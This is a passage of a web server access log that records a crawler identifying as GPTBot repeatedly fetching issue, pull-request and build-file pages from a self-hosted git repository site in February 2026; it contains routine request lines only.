[Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:18:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=all&type=all" +[17/Feb/2026:18:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:18:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:18:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11278] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" +[17/Feb/2026:18:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?files=PostgresMonitor%2fReadMe.txt" [Client 74.7.227.38] [Length 17084] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:18:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" +[17/Feb/2026:18:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/tags.rss" [Client 74.7.227.38] [Length 347] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/tags" +[17/Feb/2026:18:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9912] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:18:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr 